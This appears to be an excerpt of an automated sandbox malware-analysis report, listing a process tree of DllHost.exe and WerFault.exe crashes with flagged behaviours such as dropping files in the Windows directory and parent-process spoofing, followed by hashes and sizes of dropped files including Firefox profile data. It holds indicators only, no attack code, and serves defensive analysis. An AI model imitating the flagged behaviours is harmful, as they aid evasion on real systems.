-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
PID:1988
-
C:\Windows\system32\DllHost.exe (tree depth 1)
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
- Drops file in Windows directory
PID:4192
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4192 -s 692
- Program crash
PID:4160
-
C:\Windows\system32\WerFault.exe (tree depth 2)
C:\Windows\system32\WerFault.exe -u -p 4192 -s 668
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3748
-
Network
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize 30KB
MD5 ed311df6c43285f8f165b89293bd96dc
SHA1 39cd87d13d6bff2155083d834fb1670ba1e9dfcc
SHA256 467de0cf1a99077db86e3d57a95a8c852668fe08eefba52d40ae49da7014e89e
SHA512 607d7b2cfb157e2b95b5ca809e61def87bb08625730086de10537a7a17d7299b4066bc323111d2c8be485e0c095f5c4e75ddda4957dec55906e3bfca1c9602f7
-
Filesize 12KB
MD5 e8738e0ccc1966d4a660e8a79d5d497b
SHA1 5d21bc87ad93b20143ae5ac767ac880b668ee89f
SHA256 b471e835accab52c53ff1309e6f73bfb1764351614873da676aea1eceb271c8a
SHA512 bd7e9b271316807af999cc57618bd53af81917a102f283968aed02d5c4714913401d9503fcbfeac15aea9a575d71332d6b5e3e4e30e8247c3c9237394c4f2370
-
Filesize 29KB
MD5 b881a06d6ab03a733a28d1f378635f75
SHA1 6ad4561c94c1dc055ec2d31d3a2f8325fec92dbc
SHA256 d24f99b10e11c8fe3da387c1e4ef9b5954d8e69b01d2fddf2514cdbdb4953250
SHA512 72d0b39d27183a0cb512e6f8b763d16d36106608c27e059337afecd00f4ee6c940ec4e2771120b1cadc0b9bd741aef01e7ef4374d77bf3715e21b9490bef17b4
-
Filesize 12KB
MD5 171889fb841d7debf5da43392ccd3ef3
SHA1 4890fcf85d7de7fa3b1e4cb214875e0370f5d135
SHA256 332a1f4b14cc9123bb38bcca61d835a9e18738036b105afc853c271c1e13c1ed
SHA512 df6dbfd477b8ad186a252a2e1248e36181406e2c24fc7ff0fbde462730a52b177673d5abc4956651594febac275cbb8d4b1b479119cd492c00bb2d3b284db62b
-
Filesize 31KB
MD5 ed0eb3a3ab6ad17666b455624f293dca
SHA1 ab58aef949db99513dc8b119cecdbc12d9fbbec3
SHA256 387026b6423ab78b8bc94139dbfe525b21d49dec77bc458b8ce6b042f0970075
SHA512 e03d7e67574fa4b17a68366dede6b7d567e0a381716f3306644e9088bd23db45ea33a43cded8645b5b36dcfdbdd8a006ac020358be3f932cb8d3910f8f90dce7
-
Filesize 12KB
MD5 535f7c646ab273e67e0be6b554aa6b4c
SHA1 0901bfb62f3ea32c38bd3eae0fafb9bd39cdf271
SHA256 75bb2f949e5c407261f4e191de2da93c08b840ecf6a605a29f54b8dca8079571
SHA512 69f3c22f3a1a224de959b0378f20b35f33a0cfd1b910a74e0e5a9e1bbada213a4cd6ecafd4d3b4aa3aa7ed2c6bf67e5cb893e3bf4fb2ff17475f22074508a45c
-
Filesize 30KB
MD5 d765ec59c68cee921169a67c83d1533b
SHA1 b77c5dc5466f1b4b85c70bc2649880078c4654ae
SHA256 4bade0c4eaf8f9a2fafbe6c03433fe6b988384242bbf77fcc125ccbb1be82968
SHA512 da13d26d500cf0a7d07f41f82c8d8c678a7a6ca224d8d31070ffdc020347f7a826baf0318610e38aa4754928e09b35fe0f4d1ec61972fca60c9ba55750ce72f0
-
Filesize 12KB
MD5 123bcc4f96f0ad7963a5d9e6cff5aebf
SHA1 9bd4b0bbb080b4890fd25a158201775b07b676bd
SHA256 37af00b8e883dd7c364ed55a638b5ca9cd09a25107b354e852abf9a7ac6c78e2
SHA512 2771fdbf5eaaae05cbf0811438a74d2845c0ad29ba6173dbc3dea42befe002c225bc6addb089cfca1a52a8a915aede9c00900276d04180fbf5ba8e69e013b071
-
Filesize 30KB
MD5 d6dc02dc734de85e44b85c022e857f55
SHA1 07998d6e3d14436c16b73dc172b23a4d73dc8062
SHA256 4534cf8ebc6b7d35ee92b78de8304d2a3fe8e20cb4402eefdef44f17b3953966
SHA512 d0fecdbe6e01632ef4b046ae93f63d971b598c7bf46ded52a77a7ceabd772fdc150a1a79ba8a47a6689eda6f774e65f738731f028ea1ab6f9ed2e6363e739203
-
Filesize 12KB
MD5 21d7b8e0f7734d6cd214250ee0ebf52e
SHA1 ec64b0fb776b1f88e28571c64f2f691c588c971c
SHA256 645c789217ba40b51b728a9e735182e0c97689ce55286a7d74973cec2529ab03
SHA512 aac2fec0860ccc749f06eba863a3a20664b680c5939f49887d3dafdba8419065850dcb81d6d358f643246e4cd757b29b83fc54de491b363a6e5422874a51fcc0
-
Filesize 30KB
MD5 a68c97d1c92313076ddba50380722da5
SHA1 a70f90b8ed2c3b6481f809838830d4543668ad8d
SHA256 847103ce2d700698010ef5f7489ec9e2d10960c91340aa1cdf14c42da9d108c8
SHA512 ac6f7402e22a3e0903fc9ab951f5d589c84a5e301e1a0645d0c5d476b91e0526c814d48977eb16f468212ae5d1a7ef61770b9050b1b9056e387ae1833d08f791
-
Filesize 12KB
MD5 9b4d6d3b6bd2f1c85473c7a44c650c9c
SHA1 102f8cea4420290a537236ea1af5aebe83d29cfa
SHA256 1ba9afdac38d8793d59d67130c57ed6831a8d90a782eefd29b49bdcef9051154
SHA512 30f3cecf5b660f238bebfa2e32cef9cd3364b578a7bc70dca7773cc4732224984127fd78ccb59d16714a82b75418ca8155558d705bf0d57882e75155ad297744
-
Filesize 29KB
MD5 8e165c49312a0f43bd197ba683615d5d
SHA1 99ff2f7380d928735396efad7677675d4672f1f3
SHA256 4464152ce3cc9b57c8da576dcf2708ee62696e79f9b183ac175587d393f3ed86
SHA512 936dd67967ee068d3caa0d167beef0bb564e5d21fa0b98351003401786d0454ca052ee2abb5bcbcfe57f23b84aa577d781c040237d1333e16172557036364dd3
-
Filesize 12KB
MD5 845e3c4369758342d41a12c8e491e407
SHA1 e16719cff933dd435cf7393eb7adfd8b0ec14206
SHA256 3074746f5853c59f8fe31fcbefea0d3c52cf98b0000551d9827058c0c90444b7
SHA512 02e1e661023f515cc88dde9e5e299a83ae48fbad8e7656005dbfda2616972afc06bf418cd83d7460123d42d82fff5b55902de6db6b048063b8ea879a4396a310
-
Filesize 29KB
MD5 c77626c8f5fba5743377fb2740f06c9a
SHA1 2c0a7cd4d4305051e22054223a5070ab261d2ee6
SHA256 73fa360b049d6611301308737b4e026d4329a3e1a3b3a9d61a9be9c197b02933
SHA512 7e83a6f5c12b9bdf208c397824efd56889df3ca601d9f5daf1477e5441420dd035000b22c661daf8faffcc5037f2e3aae0d9d5a0349f77eaa3d7af430c8cd510
-
Filesize 12KB
MD5 6d639bf2ec392af369027b8d7c16c36b
SHA1 d535bf24591e75680745dae4d0db193db34c3971
SHA256 bae9ee89fb472678f0f52a0298e1f11178411fdfcb394b12cad711d217369e23
SHA512 16de433a87d9d09cdde8dac0402c5d723f31d0d9e8d9fe96745c75236b91a3b21668ca3cbb1b8b83929d443f6e0137e1698db3b819827a7d9f4a8f4442f8b833
-
Filesize 3KB
MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
Filesize 295KB
MD5 2cc4c9c43ada93015209121ecf823986
SHA1 0d7cd7a74a7ee540eaf9605ddeceabca4dca306f
SHA256 e04d9819795aef84c8df92850da3841f250d52d0c9c5a1f7804dc99b62cf46c8
SHA512 d03e34e15ef442d98f26d8f56128d5eeebbb7a28863054665eabcbc55ba4c3cd7db72e7a57798b41a186555d0bd828bd4e05bef1a414143a52c09f45fbd87bee
-
Filesize 599KB
MD5 4d80870917f73b1bcc59430ef773c2ed
SHA1 02f50486020484c9af462461dcdb63b984c124bd
SHA256 98378968a69e7f93eac88fe22d0dd0bf4b6e06dfa83cbb39478c35be4405dc94
SHA512 be734996d09e1392a1cf7dc3181ab278e320b951b82484dfa16efcc56e8a0cbbbaaef0e9f4905813c783ef572587558210390570f21ec2749417f08b1cae7375
-
Filesize 1KB
MD5 276211f264f8bf45d13a1c481c70e64d
SHA1 f0624f55cb85000ffa1ea49c1334a0f5c42812c5
SHA256 3b2126f3b87185b9fb79b2ad0743e83aa8736b6db414a0bcdbd54766363d0bc3
SHA512 c167f33e959b0a578bd1325d5617a20283aa6729a08f9d782909a80a968d74a38b4a122cdd60ae7c05908e41ca48fe87a5aca0c145fb300557ba7918e929dc19
-
Filesize 8KB
MD5 e935e960448ec20b52db21a47223fd69
SHA1 f6da72b0e724bc92372d17418d1aa348f554355d
SHA256 d9d8b2269320096b61245a4c4ec94412964148da66f6ba390915d2f7e40a3443
SHA512 430b4729d549e23fdb427fd5518f51ae19afeded234cfc9c0489e95cd5e8ac03d71e14556c3481bc233ea2696cddbcdf5103ea46dca957f0891a8eaadd883938
-
Filesize 512KB
MD5 44681f24acd51bb8006834ea7d707b1b
SHA1 a0aa0d53d27340842d1e9e9ebc063d5153ce47ef
SHA256 77a72a50e0116329d27b3368f56e9c6c9f045957cb6de656d84836e06e290298
SHA512 8d12a77f5dc61735fed95be28ae271a3e21e0f75d670b742d554421a35b91701043e5592ee0258698bebf33ff443af780c2397bc58af76a28dd8f306931b9f53
-
Filesize 512KB
MD5 44681f24acd51bb8006834ea7d707b1b
SHA1 a0aa0d53d27340842d1e9e9ebc063d5153ce47ef
SHA256 77a72a50e0116329d27b3368f56e9c6c9f045957cb6de656d84836e06e290298
SHA512 8d12a77f5dc61735fed95be28ae271a3e21e0f75d670b742d554421a35b91701043e5592ee0258698bebf33ff443af780c2397bc58af76a28dd8f306931b9f53
-
Filesize 25.5MB
MD5 5093d7cd8d1560c48053fd85d08b3af8
SHA1 d4c66157e0502dd917c671c01ae64f3a5365a268
SHA256 201570432aaa78102bc07499b3d9d4383ee20929ef86a39c604ef8304a52ae50
SHA512 72f108a11da21f8583a5635c38c1e210ca89c8d6df821ca9194ecbddc4cd085d27b15d4093450243fa4477dcbf3eaf1189d423811412b23437cc0b0e099ac14d
-
Filesize 16KB
MD5 e1500dc96b2d8d865987b1fa53f935ac
SHA1 d44f8324a1000c8754210d1e8a60d74a28b485ce
SHA256 67396cc35236b9f624b94bbcdb54b5da31a2fd8c0eb4bfc471084f9ecbf3a2af
SHA512 92cbd62569ef0dcd24cfdf6455a3c834e5d7862139787a76579756ed2cf56875da72c6dcb283b522757f501debabddfab99d532e76e8b6a95493c9a52032bb6b
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\evlzgz75.default-release\activity-stream.discovery_stream.json.tmp
Filesize 145KB
MD5 84577edbe6a8ce8f7aeff1367c143553
SHA1 a956a0409bfc5ae92a0c849b67214adde061e8c3
SHA256 b5bf848146e0f374584b22836bb35ebde1627385cca62e1bb93a54fa63bf5b37
SHA512 461385e49fd901a15e030db313a6a1c40b58a8547da9ec55aac0e0ba937c69ed26c2d6679377822d9368ccd982bad9487ef8330ba609307ca752ebdf59aedc36
-
Filesize 1B
MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize 6KB
MD5 f843fc3b858888d342076c7199266348
SHA1 97dea7b7d8486f03cc085ef488fda80fe53515a0
SHA256 19b6e95d7e0e109333b648d994d42f1f8552467f8f43a4570f84dc5c5e2189a4
SHA512 9b25cfb2a279bda5827e7d4c3446c75cb5057e7a886e23b7f3eb44d3a2fbb04d19249ff423c821cc41ea7a6d8585fafb0b4f9ae8d54274883250c4a4a1c7c1f7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\evlzgz75.default-release\sessionCheckpoints.json.tmp
Filesize 259B
MD5 700fe59d2eb10b8cd28525fcc46bc0cc
SHA1 339badf0e1eba5332bff317d7cf8a41d5860390d
SHA256 4f5d849bdf4a5eeeb5da8836589e064e31c8e94129d4e55b1c69a6f98fb9f9ea
SHA512 3fa1b3fd4277d5900140e013b1035cb4c72065afcc6b6a8595b43101cfe7d09e75554a877e4a01bb80b0d7a58cdcfe553c4a9ef308c5695c5e77cb0ea99bada4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\evlzgz75.default-release\sessionstore.jsonlz4
Filesize 883B
MD5 4a22d7a002efe3afc068c167d465efa0
SHA1 306d274aae98decc0628a44a0858cd18c4ad515e
SHA256 9b797a3e54787511036618d9b452b266839f82323bc0995b87f7478c77cca8ee
SHA512 c849f2096e2d0cdf8213c53d66719ad15d9465065df0bbb817e4146f664234678274d74bd4b0ec7ff69a918130e0a06f510978ee41a8649ff4706f05e818c26f
-
Filesize 22KB
MD5 80648b43d233468718d717d10187b68d
SHA1 a1736e8f0e408ce705722ce097d1adb24ebffc45
SHA256 8ab9a39457507e405ade5ef9d723e0f89bc46d8d8b33d354b00d95847f098380
SHA512 eec0ac7e7abcf87b3f0f4522b0dd95c658327afb866ceecff3c9ff0812a521201d729dd71d43f3ac46536f8435d4a49ac157b6282077c7c1940a6668f3b3aea9
-
Filesize 6KB
MD5 01e21456e8000bab92907eec3b3aeea9
SHA1 39b34fe438352f7b095e24c89968fca48b8ce11c
SHA256 35ad0403fdef3fce3ef5cd311c72fef2a95a317297a53c02735cda4bd6e0c74f
SHA512 9d5153450e8fe3f51f20472bae4a2ab2fed43fad61a89b04a70325559f6ffed935dd72212671cc6cfc0288458d359bc71567f0d9af8e5770d696adc5bdadd7ec
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Filesize 340B
MD5 3469aa99df5d14c826706d7ee24a6acc
SHA1 9cb00867f154c68b9b37035c420bfb7ce4b5e8f2
SHA256 8f7219e849034c59fd211e44833a4682ea24ee3a00a336ce054cb359faf51a51
SHA512 d0d11da797a8523837fafc8c3d39c2a0cba580d637714f5021891b06429c83ced147827ab96a8871f4fd11e6a1ec6f0c7b7ff4efac20f75b22d973afae4882bd
-
Filesize 3KB
MD5 2082b195c152af46507ecfa80955b64b
SHA1 ac4164f48a10fdc59e8249f98be3771a0186eee6
SHA256 2534e6e3246d38c1aaeefbb72beed327e4cd430432293b508dcc23404e15eeae
SHA512 3636baebbd311b2e3f144dfe1c42ea6e4509cfe27251bf4efa96fc12f16e8ac6ee32f0239955a7f36b1bd7f53df35ec7758390fb20e4912ae747db3a2e11bf32